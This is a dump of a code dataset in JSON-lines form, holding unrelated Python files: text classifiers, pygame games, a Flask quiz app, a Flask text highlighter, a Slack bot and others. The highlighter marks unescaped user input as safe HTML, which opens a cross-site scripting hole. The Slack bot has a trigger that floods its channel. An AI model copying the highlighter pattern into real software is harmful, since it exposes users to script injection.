cv_score)\r\n print(\"Total time taken for Logistic is \", time.time() - start, \" seconds\")\r\n print(\"Plotting Precision recall curve\")\r\n result = clf.predict_proba(test_vec)\r\n # print(result[:15])\r\n # skplt.metrics.plot_precision_recall(y_train_data, result)\r\n result = [i[1] for i in result]\r\n test_auc = metrics.roc_auc_score(np.array(test_label1), result) # 验证集上的auc值\r\n print(\"test_auc:\", test_auc)\r\n # plt.show()\r\n return pred_logistic, result\r\n\r\nimport xgboost as xgb\r\ndef xgboost_test(train_vec, test_vec, y_train_data):\r\n dtrain = xgb.DMatrix(train_vec, label=y_train_data)\r\n dtest = xgb.DMatrix(test_vec)\r\n params = {'booster': 'gbtree',\r\n 'objective': 'binary:logistic',\r\n 'eval_metric': 'auc',\r\n 'max_depth': 4,\r\n 'lambda': 10,\r\n 'subsample': 0.75,\r\n 'colsample_bytree': 0.75,\r\n 'min_child_weight': 2,\r\n 'eta': 0.025,\r\n 'seed': 0,\r\n 'nthread': 8,\r\n 'silent': 1}\r\n watchlist = [(dtrain, 'train')]\r\n bst = xgb.train(params, dtrain, num_boost_round=5, evals=watchlist)\r\n # # 输出概率\r\n # ypred = bst.predict(dtest)\r\n # print(ypred)\r\n # print(type(train_vec))\r\n # print(type(y_train_data))\r\n # data_train = xgb.DMatrix(train_vec, label=y_train_data)\r\n #\r\n # data_test = xgb.DMatrix(test_vec, label=test_label1)\r\n # watch_list = [(data_test, 'eval'), (data_train, 'train')]\r\n # params = {'max_depth': 1, 'eta': 0.9, 'silent': 1, 'objective': 'multi:softmax', 'num_class': 3}\r\n # bst = xgb.train(params, data_train, num_boost_round=7, evals=watch_list)\r\n # y_train_pred = bst.predict(data_train)\r\n # y_test_pred = bst.predict(data_test)\r\n # print('XGBoost训练集准确率:', accuracy_score(y_train_data, y_train_pred))\r\n # print('XGBoost测试集准确率:', accuracy_score(test_label1, y_test_pred))\r\n # return y_test_pred\r\n\r\n\r\n\r\n# Word2Vec vectorization\r\ndef word2vec(train_data, test_data, train_list, test_list):\r\n model_name = \"GoogleNews-vectors-negative300.bin.gz\"\r\n model_type = \"bin\"\r\n num_features = 300\r\n for i in range(0, len(train_data.review)):\r\n train_list.append(clean_review(train_data.review[i]))\r\n if i % 1000 == 0:\r\n print(\"Cleaning training review\", i)\r\n for i in range(0, len(test_data.review)):\r\n test_list.append(clean_review(test_data.review[i]))\r\n if i % 1000 == 0:\r\n print(\"Cleaning test review\", i)\r\n print(\"Loading the pre-trained model\")\r\n # The below part has been commented as the model was loaded, movie reviews were vectorized and stored in below pkl files,\r\n # as this takes a lot of time to execute.\r\n # We are reading the pkl files to get the final vectorized data\r\n\r\n # model = Word2Vec.load_word2vec_format(model_name, binary=True)\r\n print(\"Vectorizing training review\")\r\n # train_vec = gen_review_vecs(train_list, model, num_features)\r\n # print (\"Vectorizing test review\")\r\n # test_vec = gen_review_vecs(test_list, model, num_features)\r\n\r\n # print(\"Writing to DataFrame after vectorizing\")\r\n # df_train = pd.DataFrame(train_vec)\r\n # df_test = pd.DataFrame(test_vec)\r\n # df_train.to_pickle(\"train.pkl\")\r\n # df_test.to_pickle(\"test.pkl\")\r\n\r\n\r\n y_train_data = train_data.sentiment\r\n train_df = pd.read_pickle(\"train.pkl\")\r\n test_df = pd.read_pickle(\"test.pkl\")\r\n\r\n # Word2Vec cannot be used with Multinomial Naive Bayes as Multinomial Naive Bayes does not work with negative values\r\n pred_logistic = logistic_regression(train_df, test_df, y_train_data)\r\n pred_random_forest = random_forest(train_df, test_df, y_train_data)\r\n pred_linear_svc ,result= linear_svc(train_df, test_df, y_train_data)\r\n\r\n output = pd.DataFrame(data={\"id\": test_data.id, \"Pre\": [result[0] for i in result]})\r\n output.to_csv(\"word2vec_svc.csv\", index=False)\r\n\r\n\r\n# Testing a custom movie review\r\ndef test_custom_review(count_vec, train_vec, y_train_data):\r\n print('\\nTest a custom review message')\r\n print('Enter review to be analysed: ', end=\" \")\r\n\r\n test = []\r\n test_list = []\r\n test.append(input())\r\n test_review = pd.DataFrame(data={\"id\": 1, \"review\": test})\r\n print(\"Cleaning the test review\")\r\n for i in range(0, len(test_review.review)):\r\n test_list.append(clean_review(test_review.review[i]))\r\n print(\"Vectorizing the test review\")\r\n test_review_vec = count_vec.transform(test_list)\r\n print(\"Predicting\")\r\n pred_naive_bayes = naive_bayes(train_vec, test_review_vec, y_train_data)\r\n if (pred_naive_bayes == 1):\r\n print(\"The review is predicted positive\")\r\n else:\r\n print(\"The review is predicted negative\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from sklearn.preprocessing import OneHotEncoder\r\n\r\n from sklearn.preprocessing import LabelEncoder\r\n train_list = []\r\n test_list = []\r\n word2vec_input = []\r\n\r\n pred_naive_bayes = []\r\n pred_logistic = []\r\n pred_random_forest = []\r\n pred_linear_svc = []\r\n # train_data = pd.read_csv(\"train.csv\", header=0, delimiter=\"\\t\", quoting=0)\r\n train_data = pd.read_csv(\"./train.csv\", lineterminator='\\n')\r\n # test_data = pd.read_csv(\"20190506_test.csv\", header=0, delimiter=\"\\t\", quoting=0)\r\n test_data = pd.read_csv(\"./20190513_test.csv\", lineterminator='\\n')\r\n # print(test_data[:10])\r\n y_train_data = train_data.label\r\n\r\n\r\n # onehot_encoder = OneHotEncoder(sparse=False)\r\n # integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\r\n # onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\r\n # print(onehot_encoded)\r\n\r\n # print(y_train_data[:10])\r\n # print(train_data.shape[0])\r\n train_data1 = train_data[int(0.2*train_data.shape[0]):]\r\n test_data1 = train_data[:int(0.2*train_data.shape[0])]\r\n # print(test_data1.shape[0])\r\n train_data1 = train_data1.reset_index(drop=True)\r\n # test_data1 = pd.DataFrame(test_data1,index=[1,2])\r\n # for i in range(test_data1.shape[0]):\r\n # test_data1.iloc[i,0] = i+1\r\n # print(test_data1)\r\n train_label1 = y_train_data[int(0.2*train_data.shape[0]):]\r\n test_label1 = y_train_data[:int(0.2*train_data.shape[0])]\r\n train_label1=train_label1.reset_index(drop=True)\r\n # print(test_label1[:10])\r\n label_encoder = LabelEncoder()\r\n train_label1 = label_encoder.fit_transform(train_label1)\r\n print(train_label1.shape)\r\n\r\n label_encoder = LabelEncoder()\r\n test_label1 = label_encoder.fit_transform(test_label1)\r\n print(test_label1.shape)\r\n\r\n # Vectorization - TFIDF\r\n print(\"Using TFIDF \")\r\n train_vect, test_vec, count_vec = tfidf_vectorizer(train_list, test_list, train_data1, test_data1)\r\n\r\n print(train_vect.shape)\r\n\r\n # Dimensionality Reduction\r\n # train_vect, test_vec = dimensionality_reduction(train_vect, test_vec, train_label1)\r\n # cc = xgboost_test(train_vect, test_vec, train_label1)\r\n # train_vec1 = train_vec[:9*len(train_vec)]\r\n # y_train_data1 = y_train_data[:9*len(y_train_data)]\r\n # test_vec1 = train_vec[9*len(train_vec):]\r\n # y_test_data1 = y_train_data[9*len(y_train_data):]\r\n\r\n # Prediction\r\n # pred_naive_bayes, result1 = naive_bayes(train_vect, test_vec, train_label1)\r\n # pred_random_forest = random_forest(train_vect, test_vec, train_label1)\r\n\r\n # pred_logistic, result2 = logistic_regression(train_vect, test_vec, train_label1)\r\n\r\n # pred_linear_svc, result3= linear_svc(train_vect, test_vec, train_label1)\r\n\r\n # result4 = (np.array(result1)+np.array(result2)+np.array(result3))/3\r\n # test_auc = metrics.roc_auc_score(np.array(test_label1), result4) # 验证集上的auc值\r\n # print(\"test_auc_end:\", test_auc)\r\n # pre_svc = svm_cross_validation(train_vec,test_vec,y_train_data)\r\n # Writing output of classifier with highest accuracy(Linear SVC)to csv\r\n # print(result4[:10])\r\n # output = pd.DataFrame(data={\"ID\": test_data.ID, \"Pred\": [i for i in result4]})\r\n\r\n # output.to_csv(\"tfidf_svc.csv\", index=False)\r\n\r\n # print(\"Using pre-trained word2vec model\")\r\n # train_list = []\r\n # test_list = []\r\n # pred_logistic = []\r\n # pred_random_forest = []\r\n # pred_linear_svc = []\r\n #\r\n # word2vec(train_data, test_data, train_list, test_list)\r\n #\r\n # # Test a custom review using Multinomial Naive Bayes\r\n # test_custom_review(count_vec, train_vect, y_train_data)","sub_path":"version2.py","file_name":"version2.py","file_ext":"py","file_size_in_byte":18893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"230859528","text":"from flask import Blueprint, redirect, url_for, request\nfrom seventeen import resources as r\nfrom seventeen.utils import templated\nfrom seventeen.models import Quiz\n\nblueprint = Blueprint('web', __name__,\n\ttemplate_folder='templates',\n\tstatic_folder='static',\n\t)\n\n@blueprint.route('/')\n@templated('index.html')\ndef index():\n\treturn {'quizzes': Quiz.objects()}\n\n@blueprint.route('/quizzes/')\n@templated('update_quiz_page.html')\ndef update_quiz_page(slug):\n\tquiz = Quiz.objects.get_or_404(slug=slug)\n\treturn {'quiz': quiz}\n\n@blueprint.route('/quizzes/create_quiz', methods=['GET'])\n@templated('create_quiz_page.html')\ndef create_quiz_page():\n\treturn {}\n\n@blueprint.route('/quizzes/', methods=['POST'])\ndef create_quiz():\n\tquiz = Quiz(\n\t\ttitle=request.form['title'],\n\t\tslug=request.form['slug'],\n\t\t)\n\tquiz.save()\n\treturn redirect(url_for('web.update_quiz_page', slug=quiz.slug))\n\n@blueprint.route('/quizzes/', methods=['POST'])\ndef update_quiz(slug):\n\tquiz = Quiz.objects.get_or_404(slug=slug)\n\tquiz.title = request.form['title']\n\tquiz.slug = request.form['slug']\n\tquiz.save()\n\treturn redirect(url_for('web.update_quiz_page', slug=quiz.slug))\n\n@blueprint.route('/quizzes//delete', methods=['POST'])\ndef delete_quiz(slug):\n\tquiz = Quiz.objects.get_or_404(slug=slug)\n\tquiz.delete()\n\treturn redirect(url_for('web.index'))\n","sub_path":"seventeen/web/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"244063801","text":"#关卡切换部分\n\n# 关卡切换\ndef show_switch_stage(screen, width, height, stage):\n\tbg_img = pygame.image.load(\"./images/others/background.png\")\n\tscreen.blit(bg_img, (0, 0))\n\tfont = pygame.font.Font('./font/simhei.ttf', width//10)\n\tcontent = font.render(u'第%d关' % stage, True, (0, 255, 0))\n\trect = content.get_rect()\n\trect.midtop = (width/2, height/2)\n\tscreen.blit(content, rect)\n\tpygame.display.update()\n\tdelay_event = pygame.constants.USEREVENT\n\tpygame.time.set_timer(delay_event, 1000)\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\texit()\n\t\t\tif event.type == delay_event:\n\t\t\t\treturn\n","sub_path":"项目进展7.py","file_name":"项目进展7.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"246124211","text":"# -*- coding: utf-8 -*- \n\nimport pygame\nimport os\nimport sys\nimport random\n\n# 게임 스크린 크기\nSCREEN_WIDTH = 480\nSCREEN_HEIGHT = 640\n\n# 색 정의\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nBLUE = (20, 60, 120)\nORANGE = (250, 170, 70)\nRED = (250, 0, 0)\n\nFPS = 60\n\n\n# 공 객체\nclass Ball(object):\n def __init__(self, bounce_sound):\n self.rect = pygame.Rect(int(SCREEN_WIDTH / 2), int(SCREEN_HEIGHT / 2), 12, 12)\n self.bounce_sound = bounce_sound\n self.dx = 0\n self.dy = 5\n\n # 공 업데이트\n def update(self):\n self.rect.x += self.dx\n self.rect.y += self.dy\n\n # 공이 게임 화면 왼쪽으로 넘어갈 때\n if self.rect.left < 0:\n self.dx *= -1\n self.rect.left = 0\n self.bounce_sound.play()\n # 공이 게임 화면 오른쪽으로 넘어갈 때\n elif self.rect.right > SCREEN_WIDTH:\n self.dx *= -1\n self.rect.right = SCREEN_WIDTH\n self.bounce_sound.play()\n\n # 공 리셋\n def reset(self, x, y):\n self.rect.x = x\n self.rect.y = y\n self.dx = random.randint(-3, 3)\n self.dy = 5\n\n # 공 그리기\n def draw(self, screen):\n pygame.draw.rect(screen, ORANGE, self.rect)\n\n\n# 플레이어 객체\nclass Player(object):\n def __init__(self, ping_sound):\n self.rect = pygame.Rect(int(SCREEN_WIDTH / 2), SCREEN_HEIGHT - 40, 50, 15)\n self.ping_sound = ping_sound\n self.dx = 0\n\n # 업데이트\n def update(self, ball):\n if self.rect.left <= 0 and self.dx < 0:\n self.dx = 0\n elif self.rect.right >= SCREEN_WIDTH and self.dx > 0:\n self.dx = 0\n # 플레이어가 공이랑 충돌한 경우\n if self.rect.colliderect(ball.rect):\n ball.dx = random.randint(-5, 5)\n ball.dy *= -1\n ball.rect.bottom = self.rect.top\n self.ping_sound.play()\n\n self.rect.x += self.dx\n\n # 그리기\n def draw(self, screen):\n pygame.draw.rect(screen, RED, self.rect)\n\n\n# 적 객체\nclass Enemy(object):\n def __init__(self, pong_sound):\n self.rect = pygame.Rect(int(SCREEN_WIDTH / 2), 25, 50, 15)\n self.pong_sound = pong_sound\n\n # 업데이트\n def update(self, ball):\n # 적보다 공이 왼쪽에 있을 때\n if self.rect.centerx > ball.rect.centerx:\n diff = self.rect.centerx - ball.rect.centerx\n if diff <= 4:\n self.rect.centerx = ball.rect.centerx\n else:\n self.rect.x -= 4\n # 적보다 공이 오른쪽에 있을 때\n elif self.rect.centerx < ball.rect.centerx:\n diff = ball.rect.centerx - self.rect.centerx\n if diff <= 4:\n self.rect.centerx = ball.rect.centerx\n else:\n self.rect.x += 4\n # 적이 공과 충돌한 경우\n if self.rect.colliderect(ball.rect):\n ball.dy *= -1\n ball.rect.top = self.rect.bottom\n self.pong_sound.play()\n\n # 그리기\n def draw(self, screen):\n pygame.draw.rect(screen, BLACK, self.rect)\n\n\n# 게임 객체\nclass Game(object):\n def __init__(self):\n bounce_path = resource_path(\"assets\\\\bounce.wav\")\n ping_path = resource_path(\"assets/ping.wav\")\n pong_path = resource_path(\"assets/pong.wav\")\n font_path = resource_path(\"assets/NanumGothicCoding-Bold.ttf\")\n bounce_sound = pygame.mixer.Sound(bounce_path)\n ping_sound = pygame.mixer.Sound(ping_path)\n pong_sound = pygame.mixer.Sound(pong_path)\n self.font = pygame.font.Font(font_path, 50)\n self.ball = Ball(bounce_sound)\n self.player = Player(ping_sound)\n self.enemy = Enemy(pong_sound)\n self.player_score = 0\n self.enemy_score = 0\n\n # 게임 이벤트 처리 및 조작\n def process_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.player.dx -= 5\n elif event.key == pygame.K_RIGHT:\n self.player.dx += 5\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n self.player.dx = 0\n\n return False\n\n # 게임 로직 수행\n def run_logic(self):\n self.ball.update()\n self.player.update(self.ball)\n self.enemy.update(self.ball)\n\n # 공이 게임 화면 위로 넘어간 경우 (플레이어가 이긴 경우)\n if self.ball.rect.y < 0:\n self.player_score += 1\n self.ball.reset(self.player.rect.centerx, self.player.rect.centery)\n # 공이 게임 화면 아래로 넘어간 경우 (적이 이긴 경우)\n elif self.ball.rect.y > SCREEN_HEIGHT:\n self.enemy_score += 1\n self.ball.reset(self.enemy.rect.centerx, self.enemy.rect.centery)\n\n # 메시지 출력\n def display_message(self, screen, message, color):\n label = self.font.render(message, True, color)\n width = label.get_width()\n height = label.get_height()\n pos_x = int((SCREEN_WIDTH / 2) - (width / 2))\n pos_y = int((SCREEN_HEIGHT / 2) - (height / 2))\n screen.blit(label, (pos_x, pos_y))\n pygame.display.update()\n\n # 게임 프레임 출력\n def display_frame(self, screen):\n screen.fill(BLUE)\n\n # 플레이어 점수가 10점일 경우\n if self.player_score == 10:\n self.display_message(screen, \"승리!\", WHITE)\n self.player_score = 0\n self.enemy_score = 0\n pygame.time.wait(2000)\n # 적 점수가 10점일 경우\n elif self.enemy_score == 10:\n self.display_message(screen, \"패배!\", WHITE)\n self.player_score = 0\n self.enemy_score = 0\n pygame.time.wait(2000)\n else:\n self.ball.draw(screen)\n self.player.draw(screen)\n self.enemy.draw(screen)\n # 게임 중앙 점선\n for x in range(0, SCREEN_WIDTH, 24):\n pygame.draw.rect(screen, WHITE, [x, int(SCREEN_HEIGHT / 2), 10, 10])\n # 적 점수 표시\n enemy_score_label = self.font.render(str(self.enemy_score), True, WHITE)\n screen.blit(enemy_score_label, (10, 260))\n # 플레이어 점수 표시\n player_score_label = self.font.render(str(self.player_score), True, WHITE)\n screen.blit(player_score_label, (10, 340))\n\n\n# 게임 리소스 경로\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n print(base_path)\n return os.path.join(base_path, relative_path)\n\n\ndef main():\n pygame.init()\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"PingPong Game\")\n clock = pygame.time.Clock()\n game = Game()\n\n done = False\n while not done:\n done = game.process_events()\n game.run_logic()\n game.display_frame(screen)\n pygame.display.flip()\n clock.tick(FPS)\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pygame/suanlab/5_Ping_Pong_Game/pingpong_game.py","file_name":"pingpong_game.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"458304152","text":"import os\nfiles = os.listdir('/search/odin/guobk/data/data_polyEncode/vpa/train/')\nfiles = [os.path.join('/search/odin/guobk/data/data_polyEncode/vpa/train',file) for file in files]\nfor i in range(len(files)):\n print(i)\n R = []\n with open(files[i],'r') as f:\n s = f.read().strip().split('\\n')\n tok = '1'\n for j in range(len(s)):\n if s[j][0]!=tok:\n continue\n t = s[j].split('\\t')\n R.append('\\t'.join([t[0]]+t[2:]+[t[1]]))\n tok = str(1-int(tok))\n if len(R)%2!=0:\n R = R[:-1]\n with open(files[i],'w') as f:\n f.write('\\n'.join(R))\n\n\n\n\n# cache_file=\"/search/odin/guobk/data/data_polyEncode/ubuntu_data/train0.txt_[join_str]maxlen30_maxhis4_samplecntNone.cache\"\n# trainfile=\"/search/odin/guobk/data/data_polyEncode/ubuntu_data/train0.txt\"\n# with open('/search/odin/guobk/data/data_polyEncode/ubuntu_data/train1.txt','r') as f:\n# s0 = f.read().strip().split('\\n')\n# R0 = []\n# R1 = []\n# for i in range(len(s0)):\n# with open(trainfile,'w') as f:\n# f.write('\\n'.join(s0[:-(i+1)]))\n# train_dataset = SelectionDataset(os.path.join('/search/odin/guobk/data/data_polyEncode/ubuntu_data', 'train{}.txt'.format(0)),context_transform, response_transform, sample_cnt=None)\n# train_dataloader = DataLoader(train_dataset,batch_size=32,collate_fn=train_dataset.batchify_join_str,shuffle=True)\n# os.remove(cache_file)\n# try:\n# for step, batch in enumerate(train_dataloader, start=1):\n# print(step)\n# R0.append(s0[i])\n# break\n# except:\n# R1.append(s0[i])\n\ncache_file=\"\"\ntrain_dataset = SelectionDataset(os.path.join('/search/odin/guobk/data/data_polyEncode/vpa/train', 'train-{}.txt'.format('0')),context_transform, response_transform, sample_cnt=None)\ntrain_dataloader = DataLoader(train_dataset,batch_size=32,collate_fn=train_dataset.batchify_join_str,shuffle=True)\n# os.remove(cache_file)\nfor step, batch in enumerate(train_dataloader, start=1):\n print(step)\n\nwith open('/search/odin/guobk/data/data_polyEncode/vpa/train.txt','r') as f:\n S = f.read().strip().split('\\n')\nS = [s.split('\\t') for s in S]\nR = []\ni = 0\nr = []\nquery = ''\ndoc_pos = ''\ndoc_neg = ''\nwhile i c and d > a and c+d > a+b and c > 0 and d > 0 and a % 2 == 0: #testa condição\n print(\"Valores aceitos\")\nelse:\n print(\"Valores nao aceitos\")","sub_path":"Uri-Online-Judge/Wellington/Python/Iniciante/1035.py","file_name":"1035.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"603938385","text":"\"\"\"Flask module\nfile: __init__.py\ndate: 12.12.2012\nauthor smith@example.com\nlicense: MIT\"\"\"\n\nfrom flask import Flask, render_template, request, Markup\n\n\ndef create_app():\n \"\"\"Create flask app for binding.\"\"\"\n app = Flask(__name__)\n\n template_file_name = 'index.html'\n\n @app.route('/', methods=['GET'])\n def index():\n return render_template(template_file_name)\n\n @app.route('/', methods=['POST'])\n def process():\n search_text = request.form['search']\n text = request.form['text']\n is_sensetive = request.form.get('is_sensetive', '0')\n highlighted_text = highlight_text(text, search_text, is_sensetive)\n result = {'text': text,\n 'highlighted_text': Markup(highlighted_text),\n }\n return render_template(template_file_name, **result)\n\n def markup_text(text):\n \"\"\"Markup given text.\n This is supplementary method that helps you to wrap marked text in tags.\n @:param text - string text to be marked\n @:return marked text, e.g., highlighted text.\"\"\"\n result = \"\" + text + \"\"\n return result\n\n def replacement_list(expr, text):\n \"\"\"Conducts text processing to obtain all forms of the search text.\n @: param text - the text of the line to be marked\n @: return a list of unique word forms.\"\"\"\n result = []\n index = 0\n while index >= 0:\n index = text.lower().find(expr.lower(), index)\n if index < 0: break\n separator = ''\n result.append(separator.join([text[x] for x in range(index, index+len(expr))]))\n index += len(expr)\n result = set(result)\n return result\n\n def highlight_text(text, expr, is_sensetive='0'):\n \"\"\"Markup searched string in given text.\n @:param text - string text to be processed (e.g., 'The sun in the sky')\n @:param expr - string pattern to be searched in the text (e.g., 'th')\n @:return marked text, e.g., \"The sun in the sky\".\"\"\"\n if is_sensetive == '1':\n text = text.replace(expr, markup_text(expr))\n else:\n replacement = replacement_list(expr, text)\n for token in replacement:\n text = text.replace(token, markup_text(token))\n return text\n\n return app\n","sub_path":"highlighter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"596970947","text":"#!/usr/bin/python3\n\nimport os\nimport sys\n\nPATH=\"/var/books\"\n\ndef capitalize_titles(books):\n for book in books:\n os.rename(PATH+os.sep+book,PATH+os.sep+book.title()+\".pdf\")\n print(\"Renamed {}\".format(book))\n\ndef get_books(path):\n books=list()\n for book in os.listdir(path):\n books.append(book)\n return books\n \ndef main():\n book_list=get_books(PATH)\n if book_list:\n print(\"Renaming {} books\".format(str(len(book_list))))\n print()\n capitalize_titles(book_list)\n else:\n print(\"Some error occured, books list is empty\")\n sys.exit(1)\n \nif __name__ ==\"__main__\":\n main()\n","sub_path":"cli-apps/format_books_titles.py","file_name":"format_books_titles.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"442718040","text":"\r\nimport pdb\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.functional as F\r\nimport torch.optim as optim\r\nfrom collections import OrderedDict\r\nfrom functools import reduce\r\nfrom torchvision import datasets, transforms\r\nimport matplotlib.pyplot as plot\r\n\r\nclass Autoencoder(nn.Module):\r\n\r\n def __init__(self, input_size=784):\r\n super(Autoencoder, self).__init__()\r\n self.input_size = input_size\r\n\r\n\r\n self.encoder = nn.Sequential(OrderedDict({\r\n 'lin_1': nn.Linear(input_size, 500),\r\n 'relu_1': nn.ReLU(),\r\n 'lin_2': nn.Linear(500, 100),\r\n 'relu_2': nn.ReLU(),\r\n }))\r\n\r\n self.decoder = nn.Sequential(OrderedDict({\r\n 'lin_1': nn.Linear(100, 500),\r\n 'relu_1': nn.ReLU(),\r\n 'lin_2': nn.Linear(500, 784),\r\n 'relu_2': nn.ReLU(),\r\n }))\r\n\r\n \r\n def forward(self, x):\r\n x = x.view(-1, self.input_size)\r\n enc_z = self.encoder(x)\r\n dec_out = self.decoder(enc_z)\r\n return dec_out, enc_z\r\n\r\n'''\r\n\r\ntrain_loader = torch.utils.data.DataLoader(\r\n datasets.MNIST('/files', train=True, \r\n transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.1307,), (0.3081,))\r\n ]), download=True),\r\n batch_size=64, shuffle=True)\r\n \r\n\r\ntest_loader = torch.utils.data.DataLoader(\r\n datasets.MNIST('/files', train=False, \r\n transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.1307,), (0.3081,))\r\n ]), download=True),\r\n batch_size=1, shuffle=True)\r\n \r\nautoenc = Autoencoder().cuda()\r\nautoenc.load_state_dict(torch.load('autoencoder_mnist.pt'))\r\n\r\nopt = optim.Adam(autoenc.parameters(), lr=1e-3 )\r\nloss_fn = nn.MSELoss()\r\n\r\nfor e in range(1):\r\n loss_ep = 0\r\n for batch_x, batch_y in train_loader:\r\n batch_x = batch_x.cuda()\r\n\r\n pred, _ = autoenc.forward(batch_x)\r\n\r\n opt.zero_grad()\r\n loss = loss_fn(pred, batch_x.view(-1, 784))\r\n loss.backward()\r\n opt.step()\r\n loss_ep += loss.item()\r\n loss_ep /= len(train_loader)\r\n print('Epoch {} with loss {}'.format(int(e), loss_ep))\r\n\r\n torch.save(autoenc.state_dict(),\"autoencoder_mnist.pt\")\r\n\r\nwith torch.no_grad():\r\n for batch_x, batch_y in test_loader:\r\n batch_x = batch_x.cuda()\r\n pred, _ = autoenc.forward(batch_x)\r\n pred = pred.view([28,28]).cpu().numpy()\r\n batch_x = batch_x.view([28,28]).cpu().numpy()\r\n\r\n plot.subplot(211)\r\n plot.imshow(batch_x)\r\n plot.subplot(212)\r\n plot.imshow(pred)\r\n plot.show()\r\n'''","sub_path":"ga-mnist/Autoencoder.py","file_name":"Autoencoder.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154718140","text":"class Solution:\n def nextPermutation(self, nums) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n r = len(nums)-1\n while r > 0 and nums[r-1] >= nums[r]:\n r -= 1 \n if r == -1 or r == 0:\n nums.reverse()\n else:\n temps = sorted(nums[r-1:])\n index = temps.index(nums[r-1])\n for val in temps:\n if val > temps[index]:\n subs = val\n break\n index = nums[r:].index(subs) + r\n print(index)\n temp = nums[r-1]\n nums[r-1] = subs\n nums[index] = temp\n temps = nums[r:]\n temps.sort()\n nums[r:] = temps\n\na=Solution()\nb = [1,3,2]\na.nextPermutation(b)\nprint(b)","sub_path":"leetcode/nextPermutation.py","file_name":"nextPermutation.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"274318325","text":"from slackeventsapi import SlackEventAdapter\nfrom slackclient import SlackClient\nimport json\nfrom imgurpython import ImgurClient\nimport random\nfrom picture import picture\nfrom picture2 import picture2\nfrom flask import Flask,jsonify,abort,request\nimport threading as thd\n\napp = Flask(__name__)\n\n@app.route(\"/cc\")\ndef hello():\n return \"終於200了\"\n\ntokens = {}\nwith open('configs.json') as json_data:\n tokens = json.load(json_data)\n\n\nslack_events_adapter = SlackEventAdapter(tokens.get(\"slack_signing_secret\"), \"/slack/skr\", app)\nslack_client = SlackClient(tokens.get(\"slack_bot_token\"))\n\n@slack_events_adapter.on(\"message\")\ndef re_message(event_data):\n message = event_data[\"event\"]\n time = datetime.datetime.now().strftime('%H:%M')\n if message.get('text') == \"抽\":\n channel =message[\"channel\"]\n piclist = picture()\n list1 = random.sample(piclist, 1)\n list2 = \" \".join(list1)\n pic= [{\"title\": \"給你提提神~\", \"image_url\": list2}]\n slack_client.api_call(\"chat.postMessage\", channel=channel, attachments=pic)\n return 0\n if message.get('text') == \"抽帥哥\":\n channel =message[\"channel\"]\n piclist = picture2()\n list1 = random.sample(piclist, 1)\n list2 = \" \".join(list1)\n pic= [{\"title\": \"給你提提神~\", \"image_url\": list2}]\n slack_client.api_call(\"chat.postMessage\", channel=channel, attachments=pic)\n return 0\n if message.get('text') == \"q\":\n channel = message[\"channel\"]\n message = (\"洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n\")\n slack_client.api_call(\"chat.postMessage\", channel=channel, text=message)\n return 0\n@slack_events_adapter.on(\"error\")\ndef error_handler(err):\n print(\"ERROR: \" + str(err))\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=7000)","sub_path":"slackbot.py","file_name":"slackbot.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"143041491","text":"import sys\nimport os\nimport math\nimport time\n\nimport cv2\n# Get OpenCV version\n(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')\nimport numpy as np\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nIMAGES_FOLDER = os.path.join(dir_path,'images')\n\n# Uncomment this to insert other ip address\n# webcamIP = input(\"insert IP Webcam ip Address \")\n# webcamIPVideoService = webcamIP + \"/video\"\n\n\n# Uncomment this to insert other ip address\n# video = cv2.VideoCapture(webcamIPVideoService)\n\nclasses = {\n 0: 'A',\n 1: 'B',\n 2: 'C',\n 4: 'D',\n 5: 'METAL'\n}\n\nCURR_POSE = 'E'\n# DATA = 'validation_data'\n# Image count for file name\nimg_count = 0\n\n# Set up Tracker ----------------------------------------\ndef setup_tracker(ttype):\n tracker_types = ['BOOSTING', 'MIL', 'KCF', 'TLD', 'MEDIANFLOW', 'GOTURN']\n tracker_type = 